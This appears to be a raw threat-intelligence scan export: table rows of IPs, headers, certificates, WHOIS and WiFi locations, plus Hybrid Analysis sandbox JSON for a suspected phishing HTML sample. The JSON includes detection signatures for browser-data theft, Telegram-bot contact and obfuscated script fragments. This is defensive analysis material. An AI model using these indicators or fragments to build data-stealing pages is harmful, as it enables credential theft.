Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5488_1156268761\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005488]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\5488_430541408\\Part-RU]- [targetUID: 00000000-00005488]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 
00000000-00005488-00000BE4-175787744\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005488-00000BE4-178660786\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\attachments" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00005488-00000BE4-182258197\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data" (Indica | 34.148.97.127 |
| 2023-05-12 02:47:15 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-890240065.html', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\IMM32.DLL" at base 1c030000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 1a0f0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 1a0f0000\n "msedge.exe" loaded module "KERNEL32" at base 1c130000\n "msedge.exe" loaded module "C:\\WINDOWS\\TEMP\\VXOLE64.DLL" at base 130d0000\n "msedge.exe" loaded module "KERNEL32.DLL" at base 1c130000\n "msedge.exe" loaded module "COMBASE.DLL" at base cc30000\n "msedge.exe" loaded module "OLE32.DLL" at base 1b8a0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\UXTHEME.DLL" at base 183e0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base c60000\n "msedge.exe" loaded module "NTDLL.DLL" at base 1da50000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base 1afc0000\n "msedge.exe" loaded module "SHELL32.DLL" at base 1c3e0000\n "msedge.exe" loaded module "USER32.DLL" at base 1b070000'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3108:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:3108:304:WilStaging_02"\n "Local\\SM0:3108:120:WilError_01"\n "SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3108:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.22.58.100:443"\n "65.8.158.45:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - 
RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\000003.log]- [targetUID: 00000000-00003108]\n "dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp]- [targetUID: 00000000-00003108]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003108]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003108]\n "recovery-component-inner.crx" has type "Google Chrome extension version 3"- Location: [%TEMP%\\3108_988682905\\recovery-component-inner.crx]- [targetUID: 00000000-00003108]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\3108_1946692508\\_metadata\\verified_contents.json]- [targetUID: 00000000-00003108]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42\\Ruleset Data]- [targetUID: 00000000-00003108]\n "safety_tips.pb" has type "data"- 
Location: [%TEMP%\\3108_1946692508\\safety_tips.pb]- [targetUID: 00000000-00003108]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\3108_1321371211\\LICENSE]- [targetUID: 00000000-00003108]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.fingerprint]- [targetUID: 00000000-00003108]\n "Tabs_13322050400392718" has type "data"- [targetUID: 00000000-00003108]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\3108_1321371211\\Filtering Rules-AA]- [targetUID: 00000000-00003108]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003108]\n "crl-set" has type "data"- Location: [%TEMP%\\3108_2078777495\\crl-set]- [targetUID: 00000000-00003108]\n "542bbdf5-e20d-490f-b532-dad17c51b430.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\542bbdf5-e20d-490f-b532-dad17c51b430.tmp]- [targetUID: 00000000-00003108]\n "edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp]- [targetUID: 00000000-00003108]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003108]\n "53d044ee-9693-456b-888f-a32a00e16b55.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\53d044ee-9693-456b-888f-a32a00e16b55.tmp]- [targetUID: 00000000-00003108]\n "79c56db7-bc22-4724-af43-440425afe543.tmp" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\79c56db7-bc22-4724-af43-440425afe543.tmp]- [targetUID: 00000000-00003108]'}, 
{u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.42\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 185.199.111.153 on port 443"\n "HTTPS traffic to 104.22.58.100 on port 443"\n "HTTPS traffic to 65.8.158.45 on port 443"\n "HTTPS traffic to 149.154.167.220 on port 443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\',\'HTwmL\',\'FMZIW\',\'YxdVX\',\'UUudk\',\'osUws\',\'\\x22\\x20alt\',\'Vk_o8\',\'bmlnN\',\'JcovJ\',\'MJRMC\',\'bnPFS\',\'t\\x20:\\x20\',\'ZiAVF\',\'gUJej\',\'ABXSa\',\'Count\',\'sendM\',\'UeqSP\',\'LYCIA\',\'ine_a\',\'cETfn\',\'\\x20View\',\'bMiuV\',\'bot59\',\'ZhDfd\',\'nGSWQ\',\'UZgVS\',\'yzTJX\',\'btzqT\',\'#Date\',"\n Heuristic match: "api.telegram.org"\n Heuristic match: "fondon@fondon.org"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS 
connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Gener | 185.199.111.153 |
| 2023-05-12 02:54:23 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | Seattle, Washington, 98108, United States, North America | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000panther.github.io] https://www.openphish.com/feed.txt | 000panther.github.io |
| 2023-05-12 02:49:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.110.153 |
| 2023-05-12 02:53:45 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["D718:0A5D:5B243B:873E4F:645D98BE"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100097-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683855551.810015,VS0,VE33"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["c4364b8ebfd36798d0a52940340cb79811a0b765"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8002::153 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.34): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:47:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.111.153 |
| 2023-05-12 02:52:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.108.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:2F:5E:C5) | 39.0469, -77.4903 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webmail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:50:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/enterprise/contact', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 19, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://github.co/hiddenchars', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6228:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:6228:304:WilStaging_02"\n "SM0:6228:120:WilError_01"\n "Local\\SM0:6228:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.43.221.31:443"\n "138.91.254.96:443"\n "192.0.66.2:443"\n "104.17.24.14:443"\n "185.199.108.153:443"\n "192.0.76.3:443"\n "192.0.77.2:443"\n "140.82.112.21:443"\n "185.199.108.154:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"analytics.githubassets.com"\n "api.edgeoffer.microsoft.com"\n "cdnjs.cloudflare.com"\n "collector.githubapp.com"\n "github.blog"\n "github.co"\n "github.githubassets.com"\n 
"i0.wp.com"\n "pixel.wp.com"\n "stats.wp.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta property="article:publisher" content="https://www.facebook.com/GitHub" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:card" content="summary_large_image" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:site" content="@github" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:label1" content="Est. reading time" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<meta name="twitter:data1" content="1 minute" />" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n file/memory contains long string with (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<a href="https://twitter.com/github" data-ga-click="Blog\n go to Twitter\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<span class="sr-only">GitHub on Twitter</span>" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<a href="https://www.facebook.com/GitHub" data-ga-click="Blog\n go to Facebook\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<a href="https://www.youtube.com/github" data-ga-click="Blog\n go to YouTube\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n Found string "<span class="sr-only">GitHub on YouTube</span>" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")\n 
Found string "<a href="https://www.linkedin.com/company/github" data-ga-click="Blog\n go to Linkedin\n resources footer" style="color: #959da5;">" (Indicator: "dir "; File: "urlref_httpsgithub.cohiddenchars")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006628]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6628_34219005\\Ruleset Data]- [targetUID: 00000000-00006628]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\6628_723415155\\Filtering Rules]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006628]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00006628]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6628_723415155\\Filtering Rules-AA]- [targetUID: 00000000-00006628]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\GrShaderCache\\data_1]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_1]- [targetUID: 00000000-00006628]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\GPUCache\\data_1]- [targetUID: 00000000-00006628]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\6628_1327490462\\edge_autofill_field_data.json]- [targetUID: 00000000-00006628]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006628]\n "History" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History]- [targetUID: 00000000-00006628]\n "Web Data" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Web Data]- [targetUID: 00000000-00006628]\n "Visited Links" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Visited Links]- [targetUID: 00000000-00006628]\n "data_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006628]\n "Tabs_13328299007683854" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Tabs_13328299007683854]- [targetUID: 00000000-00006628]\n "ed4039f5-9b32-4b23-ad0a-52650dbff6f6.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\ed4039f5-9b32-4b23-ad0a-52650dbff6f6.tmp]- [targetUID: 00000000-00006628]\n "Diagnostic Data-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Diagnostic Data-wal]- [targetUID: 00000000-00006628]\n "urlref_httpsgithub.cohiddenchars" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "f_0004c5" has type "gzip compressed 
data from Unix original size modulo 2^32 781225"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_0004c5]- [targetUID: 00000000-00003808]\n "b978b9a8-ced7-4dda-94a5-5dbd2c301fa0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b978b9a8-ced7-4dda-94a5-5dbd2c301fa0.tmp]- [targetUID: 00000000-00006628]\n "da1e6743-5e1c-49e6-a14b-642c85423466.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\da1e6743-5e1c-49e6-a14b-642c85423466.tmp]- [targetUID: 00000000-00006628]\n "7ac7762a-375d-4477-b7a7-9b70dd9d8563.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7ac7762a-375d-4477-b7a7-9b70dd9d8563.tmp]- [targetUID: 00000000-00006628]\n "90ea1062-a906-4309-8722-cf3037f4df69.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\90ea1062-a906-4309-8722-cf3037f4df69.tmp]- [targetUID: 00000000-00006628]\n "71b10f44-5b6a-47b3-ae02-aac8dd4cc536.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\71b10f44-5b6a-47b3-ae02-aac8dd4cc536.tmp]- [targetUID: 00000000-00006628]\n "6dd70d2e-23b1-4d9b-bb59-c777ca623037.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6dd70d2e-23b1-4d9b-bb59-c777ca623037.tmp]- [targetUID: 00000000-00006628]\n "c514c718-3835-4f67-921e-d7e847351cd2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\c514c718-3835-4f67-921e-d7e847351cd2.tmp]- [targetUID: 00000000-00006628]\n "02e0acea-ebc0-4e88-8e8a-1e44ce38bd84.tmp" has type "gzip 
compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 18692"- Location: [%TEMP%\\02e0acea-ebc0-4e88-8e8a-1e44ce38bd84.tmp]- [targetUID: 00000000-00006628]\n "Network Action Predictor" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Ne | 185.199.108.153 |
| 2023-05-12 02:54:00 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 104.21.6.166 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1a0dc2 (Net ID: 0C:EA:C9:15:D9:AF) | 37.751, -97.822 |
| 2023-05-12 03:23:31 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.11:80 | 188.114.96.0/24 |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.76 | 34.74.170.74 |
| 2023-05-12 03:43:26 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | World4You Internet Services GmbH | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
